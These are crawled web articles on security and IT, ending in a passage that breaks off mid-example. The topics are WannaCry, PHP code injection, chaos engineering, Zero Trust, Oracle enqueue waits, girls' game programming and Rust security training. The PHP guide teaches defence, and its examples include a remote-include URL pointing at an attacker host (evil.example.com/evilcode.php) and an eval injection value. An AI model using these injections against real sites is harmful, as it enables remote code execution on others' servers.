For instance, in 2014, updates to several versions of Windows led to a spate of 'blue screen' fails, with Microsoft asking users to manually remove the patches. Similarly, in 2015, it was reported that a Windows 7 update was causing some computers to be stuck in a re-boot loop. However, we are not singling out Microsoft here; pretty much every vendor – however solid and reliable – is, or can expect to, experience problems. One week after the launch of iOS 8 in 2014, Apple released and then immediately withdrew its first update of the new operating system – iOS 8.0.1. Reports were flooding in that this update was breaking cellular reception and other features, such as Touch ID for some users. Apple removed the faulty update but by that time, many users had probably gone through the installation process. A new approach is needed So, we have this conundrum: organisations want to avoid the risks, costs and time involved in patches and updates (assuming they are even able to do so), but by not doing these patches and updates, they leave themselves wide open to future threats. This is why we need to take a different approach to patching for security reasons. Of course, there is no such thing as absolute security; however, protection is much more likely to be effective if it is centralised and over-arching, universally across the entire enterprise, rather than trying to protect every device separately. One possible solution could be a cloud-based approach, ideally led by internet providers and offered by them as an integral part of their service. That way, all customer traffic can be run through this cloud-based security layer, regardless of user devices, company operating systems or even their own security solutions. Threats are searched for before they can reach the end-user organisations, so infection is halted and there is no need for enterprises to make system modifications at their end. The key to this approach is the combination of several enterprise-grade security technologies that detect potentially unknown threats by monitoring suspicious data streams, using pre-configured security and filter policies. These are isolated in sandboxes and analysed using an advanced algorithm engine before they are allowed anywhere near a customer's device. Harking back to Wannacry, this technique detected the ransomware before it was passed through to the users' devices, preventing the initial infection. Being cloud-based, there is no impact on existing IT systems, nor need to install additional software, plus it can scale easily. There is no need to install software on every single user device, because the threat does not even get that far. As well as providing real-time insight into the possible threat behind IP addresses, domains, hosts and associated files, this technique can also be applied to detecting malicious bots in IoT environments. Of course, this approach to dealing with security puts the onus on telcos and ISPs, but another way of looking at it is the value that offering this service to their customers adds. It's one way in which these providers can differentiate themselves in an increasingly price-driven world. Security services could be offered to both business customers and consumers. Wannacry was one of the worst cases of malware the world has seen so far, but it is unlikely to be the last.
Given that traditional approaches to security patches – despite vast R&D and investments – aren't stopping these threats in their tracks, it's time for a rethink, by preventing them from reaching end user devices in the first place. Dennis Monner is CEO of Secucloud
Image Credit: WK1003Mike / Shutterstock
<urn:uuid:987ab742-bc4c-4865-a186-34d2741455db>
CC-MAIN-2022-40
https://www.itproportal.com/features/how-wannacry-shows-why-we-need-to-rethink-infosecurity/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00021.warc.gz
en
0.958844
1,420
2.515625
3
What is PHP Code Injection? A code injection attack exploits a computer bug caused by processing invalid data. The attacker introduces (or injects) code into the vulnerable computer program and changes the execution. Successful code injections can introduce severe risks. For example, they can enable viruses or worms to propagate. They can result in data corruption or loss, denial of access, or complete host takeover. PHP enables serialization and deserialization of objects. Once untrusted input is introduced into a deserialization function, it can allow attackers to overwrite existing programs and execute malicious attacks. This is part of our series of articles about command injection. In this article:
- How Code Injection Attacks Work
- PHP Code Injection Examples
- Preventing PHP Code Injections
- Code Injection Protection with Bright Security
How Code Injection Attacks Work Code injection attacks follow a similar pattern of manipulating web application languages interpreted on the server. Typically, a code injection vulnerability consists of improper input validation and dynamic and dangerous user input evaluation. Improper input validation User input includes any data processed by the application and manipulated or inputted by application users. It covers direct input form fields and file uploads, and other data sources like query string parameters and cookies. Applications typically expect specific input types. Neglecting to validate and sanitize the input data can allow these issues into production applications, especially when testing and debugging code. Dynamic and dangerous user input evaluation A code injection vulnerability causes an application to take untrusted data and use it directly in program code. Depending on the language, it usually involves using a function like eval(). Additionally, direct concatenation of user-supplied strings constitutes unsafe processing. Attackers can exploit these vulnerabilities by injecting malicious code into the application language. Successful injection attacks can provide full access to the server-side interpreter, allowing attackers to execute arbitrary code in a process on the server. Applications with access to system calls allow attackers to escalate an injection vulnerability to run system commands on the server. As a result, they can launch command injection attacks. Related content: Read our guide to code injection (coming soon) PHP Code Injection Examples The code in the examples below is taken from OWASP. PHP Injection Using GET Request Consider an application that passes parameters via a GET request to the PHP include() function. For example, the website could have a URL like this:
http://example.com/index.php?page=contact.php
Here the value of the page parameter is fed directly to the include() function, with no validation. If the input is not properly validated, the attacker can execute code on the web server by pointing the parameter at a remote script, for example:
http://example.com/index.php?page=http://evil.example.com/evilcode.php
The evilcode.php script will then run on the web server, enabling remote code execution (RCE). PHP Injection Using eval() Function This example shows how attackers can exploit the use of the eval() function when developers pass it unvalidated, untrusted user input. Consider the following PHP code:
$myvar = "varname";
$x = $_GET['arg'];
eval("$myvar = $x;");
The problem with this code is that it uses the value of the arg URL parameter, with no validation, directly in the string passed to eval(). Consider that an attacker injects the following input into the arg parameter:
1; phpinfo()
This will execute the phpinfo() command on the server, allowing the attacker to see the system configuration.
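Both vulnerable patterns above can be avoided by never letting user input reach include() or eval() directly. The following sketch is not part of the OWASP examples; it shows one common remediation, an allow-list, with page names and file paths invented purely for illustration.

<?php
// Allow-list approach: map user-supplied page names to known files.
// The page names and paths here are illustrative only.
$allowedPages = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
    'about'   => __DIR__ . '/pages/about.php',
];

$page = $_GET['page'] ?? 'home';

if (!array_key_exists($page, $allowedPages)) {
    http_response_code(404);
    exit('Unknown page');
}

// Only a value we defined ourselves is ever passed to include().
include $allowedPages[$page];

// For numeric input, validate or cast instead of using eval().
$arg = filter_input(INPUT_GET, 'arg', FILTER_VALIDATE_INT);
if ($arg === false || $arg === null) {
    exit('Invalid argument');
}
$myvar = $arg;   // no eval() needed at all

The important property is that nothing the user typed is ever evaluated as code or used directly as a file path.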
Related content: Read our guide to code injection examples Preventing PHP Code Injections Avoid Using exec(), shell_exec(), system() or passthru() In general, it is a good idea to avoid any commands that call the operating environment directly from PHP. From an attack vector perspective, this gives attackers many opportunities to perform malicious activity directly in the web server stack. In the past, functions such as passthru() were commonly used to perform tasks such as compressing or decompressing files, creating cron jobs, and navigating operating system files and folders. However, as soon as these functions meet user input that is not specifically validated or sanitized, serious vulnerabilities arise. PHP provides functional operators with built-in escaping—for example escapeshellarg(). When these operators are used on inputs before passing them to a sensitive function, they perform some level of sanitization. However, these functions are not foolproof against all possible attacker techniques. As of PHP 7.4, archiving can be handled using the ZipArchive class, which is part of any standard PHP compilation. This can help avoid some use of direct system functions. Avoid Using Weak Sanitization Methods Sanitization and handling of user input is paramount to PHP application security. Whenever you accept user input, you must make sure it is valid, and store and process it in such a way that it does not enable attacks against the application. Remember that any input is an open attack vector that allows a malicious attacker to interact with your application. Some functions, such as htmlentities(), are used for sanitization by some developers but are not really effective: htmlentities() discards input that does not match definable UTF character sets, yet it can still allow attackers to pass some malicious payloads. Functions like these should not be relied on for input sanitization. Avoid Displaying Verbose Error Messages It is very important to turn off the display of PHP errors in your php.ini configuration. Suppress warnings (the ~E_WARNING mask in error_reporting) to avoid error output that could be used by an attacker to identify sensitive environment information related to your PHP application and web server. Use a PHP Security Linter A linter is a development tool that scans code for errors and potential security flaws. PHP has a built-in linter, which you can run using the command php -l <filename>. However, its limitation is that it checks only one file at a time. PHPLint is a popular alternative that can check multiple files. It can be run via the CLI or as a library installed with Composer. You can also add it to a Docker image easily. PHPLint can check PHP 7 and PHP 8, providing detailed output about discovered issues. Code Injection Protection with Bright Security Bright Security Dynamic Application Security Testing (DAST) helps automate the detection and remediation of many vulnerabilities, including PHP code injection, early in the development process, across web applications and APIs. By shifting DAST scans left and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early and remediate them before they appear in production. Bright Security completes scans in minutes and achieves zero false positives by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. Scan any PHP application to prevent PHP code injection vulnerabilities – try Bright Security free.
<urn:uuid:827d6742-a201-4a4d-b467-0f6f31c6e19f>
CC-MAIN-2022-40
https://brightsec.com/blog/code-injection-php/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00021.warc.gz
en
0.84848
1,550
3.59375
4
Are you familiar with the term “chaos engineering?” If this is the first time you’ve heard it, it probably won’t be the last time. Chaos engineering (CE) is a new approach to resiliency testing that might end up having a big impact on how we business continuity professionals carry out our work of ensuring the recoverability of our organizations’ business processes and IT environments. In today’s post, I’ll give you a quick introduction to the movement and methodology of chaos engineering. Future posts will look at the potential impacts of CE on business continuity and IT/Disaster Recovery (IT/DR).
The discipline of chaos engineering can be summed up in six words: break stuff and see what happens. Chaos engineering is a pursuit with the goal of increasing the resiliency of complex computing and software systems. It can also potentially be used to strengthen other types of systems. It emerged from the recognition that our growing dependence on our computing and network environments—together with their increasing complexity and the increasingly high costs associated with interruptions to those systems—called for greater system resiliency and hence a more rigorous approach to system testing and design.
The main idea of chaos engineering is that by throwing various types of wrenches into the production environment, and seeing how the system responds, you can learn truly and accurately where your vulnerabilities are—and then you can shore them up, removing that vulnerability and increasing the resiliency of the system. The main danger, obviously, is that in throwing wrenches into your production environment you will harm your production environment, causing unpredictable and potentially serious problems where it counts. This is why it is said that chaos engineering is easy to understand but hard to do.
BIRTH OF THE CHAOS MONKEY
Chaos engineering originated at Netflix in 2011 with the creation of a software tool called a Chaos Monkey. Chaos Monkeys were designed to be released into the company’s systems, where they would behave in a manner similar to that of a wild, armed monkey turned loose in a data center or cloud environment. The Monkey would cause random damage, and the system would then attempt to contain, mitigate, and work around that damage. The purpose of turning these virtual wrecking balls loose in their systems was to identify weaknesses and strengthen resiliency. The ultimate goal was to minimize the impact of the inevitable software and hardware failures on the end-user video streaming and viewing experience.
Chaos Monkeys were so effective in helping the company probe and strengthen system resiliency that over time it developed a whole suite of similar tools, dubbed the Simian Army. The suite includes the Chaos Gorilla, Janitor Monkey, Security Monkey, and other tools. In recent years, the concept of chaos engineering has spread from Netflix to other tech companies like Google and Amazon. It now seems poised to gain a foothold in non-technology firms.
HOW IT WORKS
The chaos engineering community is based on a handful of core concepts which are set forth on the website Principles of Chaos, which was initiated by Netflix. As the site says, chaos engineering experiments are intended to “uncover systemic weaknesses” and follow four steps:
- Start by defining “steady state” as some measurable output of a system that indicates normal behavior.
- Hypothesize that this steady state will continue in both the control group and the experimental group.
- Introduce variables that reflect real-world events like servers that crash, hard drives that malfunction, network connections that are severed, etc.
- Try to disprove the hypothesis by looking for a difference in steady state between the control group and the experimental group.
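To make the four steps concrete, here is a toy, self-contained Python simulation of such an experiment. It is illustrative only: the success-rate metric, the tolerance, and the injected fault are made-up stand-ins, not part of the Principles of Chaos or of any Netflix tooling, and a real experiment would measure live production traffic and use a purpose-built failure-injection tool.

# Toy sketch of a chaos experiment: steady state, hypothesis, injected failure, comparison.
# All numbers and the injected fault are illustrative stand-ins.
import random

def serve_request(extra_failure_rate: float = 0.0) -> bool:
    """Simulate one request; normally about 99% succeed."""
    return random.random() > (0.01 + extra_failure_rate)

def steady_state(samples: int, extra_failure_rate: float = 0.0) -> float:
    """Step 1: define steady state as a measurable output (request success rate)."""
    ok = sum(serve_request(extra_failure_rate) for _ in range(samples))
    return ok / samples

if __name__ == "__main__":
    random.seed(7)
    SAMPLES, TOLERANCE = 5_000, 0.02  # Step 2: hypothesis - both groups stay within 2% of each other.

    control = steady_state(SAMPLES)                                 # no fault injected
    experimental = steady_state(SAMPLES, extra_failure_rate=0.10)   # Step 3: inject a "failure"

    drop = control - experimental                                   # Step 4: try to disprove the hypothesis
    print(f"control={control:.3f} experimental={experimental:.3f} drop={drop:.3f}")
    if drop > TOLERANCE:
        print("Hypothesis disproved: the fault disrupted steady state; add a fix to the to-do list.")
    else:
        print("Steady state held: grounds for confidence in the system.")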
If the steady state is hard to disrupt, then great. That’s grounds for having confidence in the system. When your experiments uncover weaknesses, put fixing them on your to-do list so you can correct the problem before it flares up in the larger system.
MINIMIZING THE “BLAST RADIUS”
The Principles of Chaos website also sets forth a number of “Advanced Principles” for doing chaos engineering. These include:
- Build a Hypothesis around Steady State Behavior. By focusing on systemic behavior patterns during experiments, Chaos verifies that the system does work, rather than trying to validate how it works.
- Vary Real-world Events. Prioritize events either by potential impact or estimated frequency. Consider events that correspond to hardware failures like servers dying, software failures like malformed responses, and non-failure events like a spike in traffic or a scaling event. Any event capable of disrupting steady state is a potential variable in a Chaos experiment.
- Run Experiments in Production. To guarantee the authenticity of the methods used when you exercise the system, and their relevance to the currently deployed system, Chaos strongly prefers to experiment directly on production traffic.
- Automate Experiments to Run Continuously. Running experiments manually is labor-intensive and ultimately unsustainable. Automate experiments and run them continuously. Chaos Engineering builds automation into the system to drive both orchestration and analysis.
- Minimize Blast Radius. Experimenting in production has the potential to cause unnecessary customer pain. While there must be an allowance for some short-term negative impact, it is the responsibility and obligation of the Chaos Engineer to ensure that the fallout from experiments is minimized and contained.
According to the Principles of Chaos website, there is a strong correlation between how rigorously the above principles are followed and the confidence that can be placed in the system.
CHAOS ENGINEERING AND BUSINESS CONTINUITY
There are obvious parallels between the work of these chaos engineers and the work we do as business continuity and IT/DR professionals. It is likely our field can benefit from the approaches they have pioneered. In future posts, I’ll look at how the principles and practice of chaos engineering are likely to impact and improve the practice of BC and IT/DR in non-tech organizations.
Another key resource on chaos engineering is the ebook Chaos Engineering: Building Confidence in System Behavior through Experiments, which was written by a team of Netflix engineers and is available for free at the link through O’Reilly Media.
<urn:uuid:c436a0a6-15a2-4e63-acc2-076b531ea0ae>
CC-MAIN-2022-40
https://bcmmetrics.com/chaos-engineering/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00222.warc.gz
en
0.940906
1,308
2.5625
3
The world of information technology sometimes feels like an old seafarer’s map showing monsters lurking in deep waters and warning, “There be danger here.” The digital world doesn’t need to be so melodramatic, but no company should ignore the warning that danger is all around. From ransomware to malware to hackers stealing private data, businesses need a strong IT infrastructure to protect against these threats. Zero Trust Architecture, or the Zero Trust model, is a highly secure method of protecting your data that has gained popularity in the last few years. It switches up the traditional idea of “trust but verify” to “never trust and always verify” and can be implemented over time with existing technology. What Does Zero Trust Mean? Zero Trust is exactly what its name implies. Trust no one entering your network no matter where they are located, whether from the security of your office or logged into the unsecured Wi-Fi of a hotel. John Kindervag, creator of the Zero Trust model, refers to the danger of the current system as “relying on a broken trust model” where there is a consistent failure to verify when a person accesses the system from a trusted source. Once the user, harmless or malicious, is past the perimeter security, they become a trusted user and have access to the network. The Zero Trust model eliminates this danger by having no trusted source or trusted user that could be overlooked in the verification process. All traffic, anywhere in the network, is subject to segmentation, authentication, and verification. According to the Zero Trust model: - All resources should be accessed in a secure way regardless of location or user. - No user receives access to all information. Strictly enforce access to information on a need-to-know basis. - All traffic going into or out of the system is inspected and logged in order to catch malicious traffic. What does this mean? Imagine your system is a battleship. Inside, there are hatches that can be sealed to cut off a breached part of the ship so the whole vessel doesn’t sink. In the current popular method, all the hatches are open once you make it inside the ship. The only barrier is the outer hull, the perimeter security of your system, and you can move freely throughout the ship without reauthenticating. In Zero Trust, every hatch on the ship is closed, and you must have the proper access codes to open each door. Once you’ve proven yourself, only the room you need information from is opened, all other hatches remain closed and protected. In order to get to information you’re not supposed to have, you’d have to break through each door one at a time, all while someone is monitoring your movement through the ship. Via network segmentation and next-generation firewalls, Zero Trust uses existing security features such as multifactor authentication, analytics, encryption, security groups, and file system permissions to secure all information and allow in only those who have proven they should have access. How Should I Start a Zero Trust Model? Zero Trust is more than just the technology—it’s a way of thinking about who has access to your network. Trying to overhaul your entire system to a Zero Trust model in one go would be expensive and confusing and could lead to downtime that your business can’t afford. It also requires a great deal of technological know-how, IT security, and consistent management in order to give appropriate access to the correct people for the intended information. 
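Before looking at how to start, it can help to see what “never trust, always verify” looks like mechanically. The sketch below is a minimal, illustrative Python example of a default-deny, need-to-know access check; the roles, segments, and checks are hypothetical and are not drawn from any particular product.

# Minimal sketch of a default-deny, need-to-know access check (illustrative only).
# Roles, segments, and the verification steps are hypothetical.
from dataclasses import dataclass

# Each "hatch" on the ship: a data segment and the roles allowed to open it.
SEGMENT_ACCESS = {
    "finance-ledger": {"finance"},
    "customer-pii":   {"support-lead"},
    "design-assets":  {"design", "marketing"},
}

@dataclass
class Request:
    user: str
    role: str
    segment: str
    mfa_passed: bool

def authorize(req: Request) -> bool:
    """Never trust, always verify: every request is checked, inside or outside the office."""
    if not req.mfa_passed:                 # verify identity on every request
        return False
    allowed_roles = SEGMENT_ACCESS.get(req.segment)
    if allowed_roles is None:              # unknown segment: deny by default
        return False
    return req.role in allowed_roles       # need-to-know: only the listed roles get in

if __name__ == "__main__":
    print(authorize(Request("ana", "finance", "finance-ledger", mfa_passed=True)))  # True
    print(authorize(Request("ana", "finance", "customer-pii", mfa_passed=True)))    # False
    print(authorize(Request("bo", "design", "design-assets", mfa_passed=False)))    # False

The key design choice is that refusal is the default outcome; access is granted only when every check passes.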
For most businesses, when implementing a Zero Trust model, start small. While a complete overhaul would be costly, Zero Trust features can be easily adapted into current systems in pieces and, over the course of several years, be built into all areas of a business’s systems. Many new features of business technology, such as cloud services, already work well with the Zero Trust model and can be easily adapted. Any business wanting to begin the move to a Zero Trust model should identify a small piece of its system, such as customer personal identifying information or credit card information, and institute segmentation and authentication around that information. You can then build your Zero Trust network from there over time.
Allow Managed Services to Bring Zero Trust to You
The Zero Trust model is a good way to secure your information, but if you don’t have your own IT department, it can be a challenge to implement. Zero Trust requires more than an IT company to set it up, walk away, and leave it to run. It will take time and constant adjustment to bring your current network into a complete Zero Trust model. A managed IT services company like Anderson Technologies is the best way to ensure your business is moving toward a Zero Trust model. Managed IT services can offer:
- equipment setup
- employee training (most important)
For a small business, taking the time necessary to figure out IT improvements like this on your own can hinder the daily running of your business. Don’t let security get in the way of serving your customers. Zero Trust eliminates the threat of trusting too much, but only if properly installed.
<urn:uuid:04d02e8b-43ae-4b93-8d1d-795574b2e1c1>
CC-MAIN-2022-40
https://andersontech.com/trust-no-one-anatomy-new-security-model/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00222.warc.gz
en
0.931945
1,071
2.84375
3
Oracle enqueue waits indicate that a session is waiting for a lock that is held by another session (or sessions). For Oracle 9i, there is a specific Enqueue wait event. For Oracle 10g and later, the Enqueue wait event has been separated into more than 200 unique wait events, which each include more specific information about the related lock type.
About Oracle locking
In Oracle databases, many users may update the same information at roughly the same time. Locking allows one user to update data at a given moment so that another person cannot modify the same data. The data is locked by the transaction until it is committed or rolled back, and this is known as data concurrency. Another purpose of Oracle locking is to ensure that all processes can always read the original data as they were at the time the query began, even though other users could be modifying the underlying data. This is known as read consistency.
How Oracle locking can cause problems
Although locks are a necessity in Oracle, they can create performance issues. Each time a user issues a lock, another user would be prevented from processing the locked data. Oracle locking allows a variety of locks depending on the resources required – a single row, many rows, an entire table, many tables, etc. However, the larger the scope of the lock, the more users will be prevented from processing the data. The Oracle enqueue wait event is the best indication of locking in Oracle databases.
Oracle 9i enqueue wait events
In Oracle 9i, when a session is waiting on the “enqueue” wait event, this indicates a wait for an Oracle lock that is held by another session (or sessions) in an incompatible mode to the requested mode. When sessions are found waiting on an enqueue, the following query can be used to find out which session is requesting the lock, the type and mode of the requested lock, and the session that is blocking the request:
SELECT DECODE(request, 0, 'Holder: ', 'Waiter: ') || sid sess,
       id1, id2, lmode, request, type
  FROM v$lock
 WHERE (id1, id2, type) IN (SELECT id1, id2, type FROM v$lock WHERE request > 0)
 ORDER BY id1, request;
In Oracle 9i there are approximately 40 types of locks, specified by the TYPE column in V$LOCK, and each has a unique solution set. The following are examples of the types of locks:
TX: This enqueue is a transaction lock and is typically caused by incorrect application logic or table setup issues.
TM: This enqueue represents a DML lock and is generally due to application issues, particularly if foreign key constraints have not been indexed.
ST: When Oracle performs space management operations (such as allocating temporary segments for a sort, allocating extents for a table, etc.), the user session waits on the ST enqueue.
Oracle 10g enqueue wait events
Oracle 10g makes the process of analyzing locks easier by separating the “enqueue” wait event from Oracle 9i into over 200 distinct wait events. Oracle also includes more information about the lock type within the wait event name. For example, an enqueue wait event named “enq: TX – row lock contention” indicates that row locking is occurring, while “enq: TX – index contention” indicates contention on an index. In Oracle 9i, both of these sessions would have been found waiting on the “enqueue” wait event with a lock type of “TX”, so Oracle 10g definitely helps isolate the specific issue.
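If you want to keep an eye on blocking locks over time, the 9i-style query above can be polled from a small script. The sketch below is illustrative only: it assumes the python-oracledb driver and a monitoring account with access to V$LOCK, and the connection details are placeholders to adapt to your environment.

# Illustrative sketch: poll V$LOCK for blockers and waiters using python-oracledb.
# Connection details are placeholders; adapt to your environment.
import time
import oracledb  # pip install oracledb

BLOCKING_SQL = """
SELECT DECODE(request, 0, 'Holder: ', 'Waiter: ') || sid AS sess,
       id1, id2, lmode, request, type
  FROM v$lock
 WHERE (id1, id2, type) IN (SELECT id1, id2, type FROM v$lock WHERE request > 0)
 ORDER BY id1, request
"""

def poll(interval_seconds: int = 30) -> None:
    # Placeholder credentials and DSN; the monitoring account needs SELECT on v$lock.
    conn = oracledb.connect(user="monitor", password="change_me", dsn="dbhost/ORCLPDB1")
    try:
        while True:
            with conn.cursor() as cur:
                cur.execute(BLOCKING_SQL)
                rows = cur.fetchall()
            if rows:
                print("--- blocking locks detected ---")
                for sess, id1, id2, lmode, request, lock_type in rows:
                    print(f"{sess:<14} type={lock_type} id1={id1} id2={id2} "
                          f"lmode={lmode} request={request}")
            time.sleep(interval_seconds)
    finally:
        conn.close()

if __name__ == "__main__":
    poll()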
In conclusion, Oracle 10g makes it much easier to track down the specific causes of Oracle locking problems now that the Oracle “enqueue” wait event from 9i and before has been broken up into over 200 distinct events in 10gR2.
<urn:uuid:35467474-edd0-43bc-9377-9233584deee3>
CC-MAIN-2022-40
https://logicalread.com/oracle-locking-and-enqueue-waits-dr01/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00222.warc.gz
en
0.924855
797
3.265625
3
While computer gaming remains primarily male dominated, a new study has revealed that girls may be more skilled at making story-based computer games. The research was conducted by the Informatics Department at the University of Sussex on secondary school students. They were asked to design and program their own computer game using a new visual programming language that shows pupils the computer programs they have written in plain English.
The study describes the design and evaluation of Flip, a bi-modal programming language that aims to help 11-15 year olds develop computational skills through creating their own 3D role-playing games. Flip has two main components: 1) a visual language (based on an interlocking blocks design common to many current visual languages), and 2) a dynamically updating natural language version of the script under creation. This programming-language/natural-language pairing is a unique feature of Flip, designed to allow learners to draw upon their familiarity with natural language to “decode the code”. Flip aims to support young people in developing an understanding of computational concepts as well as the skills to use and communicate these concepts effectively.
Researchers Dr Kate Howland and Dr Judith Good revealed that girls wrote more, and more complex, scripts than did boys, and there was a trend for girls to show greater learning gains relative to the boys. Dr Good stated: “Given that girls’ attainment in literacy is higher than boys across all stages of the primary and secondary school curriculum, it may be that explicitly tying programming to an activity that they tend to do well in leads to a commensurate gain in their programming skills.”
“In other words, if girls’ stories are typically more complex and well developed, then when creating stories in games, their stories will also require more sophisticated programs in order for their games to work.”
The young people, aged 12-13, spent eight weeks developing their own 3D role-playing games, using software made available with the popular medieval fantasy game Neverwinter Nights 2, which is based on the popular Dungeons & Dragons franchise. By linking blocks together, a user can tell the game to print text, change elements of gameplay and start new missions when different events occur – like the slaying of a dragon. An array of events in the game were used as triggers for the script – for instance, when a character is killed, says something, or moves to a different part of the screen. Girls were found to use nearly twice as many triggers as boys. While boys stuck to the most basic trigger (when a character says something), girls used up to seven different triggers and created complex scripts with two or more parts and conditional clauses more successfully.
Underrepresentation of women in computing has been a pressing concern, with only 17% of CS graduates in the UK being female in 2012. While the number of females taking up maths-related subjects at school level has gone up, not many girls have forayed into mainstream computer programming. Some attribute this to the portrayal of “nerdy boys” in media. However, with this new language, females can be motivated to explore programming by tapping into intuitive literary and narrative skills.
Read more here. (Image credit: Lindsey Galloway)
<urn:uuid:40ad2977-8ec2-4e46-8e30-577bd5f2fa45>
CC-MAIN-2022-40
https://dataconomy.com/2014/12/study-reveals-girls-are-better-at-making-computer-games/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.961349
657
4.0625
4
Rust is a strongly typed and safe systems programming language developed by Mozilla. Over the years, it has become the language of choice for building memory-safe programs while maintaining high performance at scale. Rust is often used for file format and protocol parsers, and also on critical projects such as the new high-performance browser engine, Servo. However, coding in a memory-safe language doesn’t mean the code will be bug-free. Different kinds of Rust security vulnerabilities, such as overflows, denial of service (DoS), use-after-free (UaF), and out-of-bounds (OOB) access, can still be found and sometimes exploited to achieve remote code execution (RCE). The goal of this course is to give you all the prerequisites to understand which kinds of vulnerabilities can be found inside Rust code. You will learn how to find low-hanging fruit bugs manually and automatically using Rust security auditing tools. Finally, you will discover how to build custom Rust fuzzers, triage and debug crashes, and improve your code coverage using different techniques. Throughout this training, students will work through many hands-on exercises, allowing them to internalize the concepts and techniques taught in class. This course is suitable for people who are new to Rust. All the theory and concepts about Rust security and Rust fuzz testing will be explained during the course.
<urn:uuid:5f0b0eb1-e214-4f43-8860-b42525cc7d0f>
CC-MAIN-2022-40
https://fuzzinglabs.com/rust-security-training/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.926513
263
3.484375
3
In a US court of law, the accused are deemed to be innocent until proven guilty. In a Zero Trust security model, the opposite is true. Everything and everyone must be considered suspect—questioned, investigated, and cross-checked—until we can be absolutely sure it is safe to be allowed. Zero Trust is a concept created by John Kindervag in 2010 during his time as Vice President and Principal Analyst for Forrester Research. When looking at failures inside organizations to stop cyberattacks, especially lateral movements of threats inside their networks, Kindervag realized that the traditional security model operated on the outdated assumption that everything inside an organization’s network could be trusted. Instead, Zero Trust inverts that model, directing IT teams according to the guiding principle of "never trust, always verify" and redefining the perimeter to include users and data inside the network. Over the last 10 years, more and more businesses have moved toward the Zero Trust model, demolishing the old castle-and-moat mentality and accepting the reality of insider threats. We take an inside look at Zero Trust, including its strengths and weaknesses, to help organizations evaluate whether they should embrace the philosophy within their own walls or consider different methods. Definition of Zero Trust Zero Trust is an information security framework that states organizations should not trust any entity inside or outside of their network perimeter at any time. It provides the visibility and IT controls needed to secure, manage, and monitor every device, user, app, and network belonging to or being used by the organization and its employees and contractors to access business data. The goal of a Zero Trust configuration should be clear: restrict access to sensitive data, applications, and devices on a need-to-know basis. Employees in finance need accounting software—all others should be barred. Remote workers should use VPNs—access from the open Internet should be prohibited. Data sharing should be limited and controlled. The free flow of information that was once one of the cornerstones of the Internet needs to be confined in order to protect networks from penetration, customers from privacy violations, and organizations from attacks on infrastructure and operations. The strategy around Zero Trust boils down to scrutinizing any incoming or outgoing traffic. But the difference between this and other security models is that even internal traffic, meaning traffic that doesn’t cross the perimeter of the organization, must be treated as a potential danger as well. While this might seem severe, consider the changes in the threat landscape over the last 10 years: the hundreds of public data leaks and breaches; ransomware attacks that halted operations on thousands of endpoints in cities, schools, and healthcare organizations; or millions of users' personally identifiable information stolen from business databases. As cybercriminals continue to turn their focus to business targets in 2020, Zero Trust seems like a smart approach to thwart increasing numbers of attacks. Implementing Zero Trust Implementing a Zero Trust security model in an organization is not simply a change in mindset. It will require a clear view of functions within the company's departments, currently-deployed software, access levels, and devices, and what each of those requirements will look like in the future. 
Often, building a Zero Trust network from the ground up is easier than reorganizing an existing network into Zero Trust, because the existing network will need to remain functional throughout the transition period. In both scenarios, IT and security teams should come up with an agreed-upon strategy that includes the ideal final infrastructure and a step-by-step plan for how to get there. For example, when setting up resource and data centers, organizations may have to start almost from scratch, especially if legacy systems are incompatible with the Zero Trust framework—and they often are. But even if companies don’t have to start from scratch, they may still need to reorganize specific functions within their security policy, such as how they deploy software or onboard employees, or which storage methods they use.
Strengths of Zero Trust
Building Zero Trust into the foundation of an organization's infrastructure can strengthen many of the pillars upon which IT and security are built. Whether it's in bolstering identification and access policies or segmenting data, by adding some simple barriers to entry and allowing access on an as-needed basis, Zero Trust can help organizations strengthen their security posture and limit their attack surface. Here are four pillars of Zero Trust that we believe organizations should embrace:
- Strong user identification and access policies
- Segmentation of data and resources
- Strong data security in storage and transfer
- Security orchestration
User identification and access
Using a secure combination of factors in multi-factor authentication (MFA) should provide teams with sufficient insight into who is making a request, and a well-thought-out policy structure should confirm which resources they can access based on that identification. Many organizations gate access to data and applications by opting for identity-as-a-service (IDaaS) cloud platforms using single sign-on services. In a Zero Trust model, that access is further protected by verifying who is requesting access, the context of the request, and the risk of the access environment before granting entry. In some cases, that means limiting the functionality of resources. In others, it might be adding another layer of authentication or session timeouts.
Robust access policies will not make sense without proper segmentation of data and resources, though. Creating one big pool of data where everyone who passes the entrance test can jump in and grab whatever they want does not protect sensitive data from being shared, nor does it stop insiders from misusing security tools or other resources. By splitting an organization's network into compartments, Zero Trust protects critical intellectual property from unauthorized users, reduces the attack surface by keeping vulnerable systems well guarded, and prevents lateral movement of threats through the network. Segmentation can also help limit the consequences of insider threats, including those that might result in physical danger to employees.
Even with restricted access to data and a reduced attack surface through segmentation, organizations are open to breaches, data leaks, and interception of data if they do not secure their data in storage and in transit. End-to-end encryption, hashed data, automated backups, and securing leaky buckets are ways organizations can adopt Zero Trust into their data security plan.
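To make the access pillar concrete before turning to orchestration, the sketch below shows one way a per-request, context- and risk-aware decision might look in code. It is a minimal illustration, not taken from any vendor product; the risk factors, weights, and thresholds are hypothetical.

# Illustrative sketch of a context- and risk-aware access decision (hypothetical factors and thresholds).
from dataclasses import dataclass

@dataclass
class AccessRequest:
    user_id: str
    mfa_satisfied: bool        # identity: did the user complete multi-factor authentication?
    device_managed: bool       # context: is the device enrolled and patched?
    network_known: bool        # context: corporate network or VPN vs. unknown public Wi-Fi
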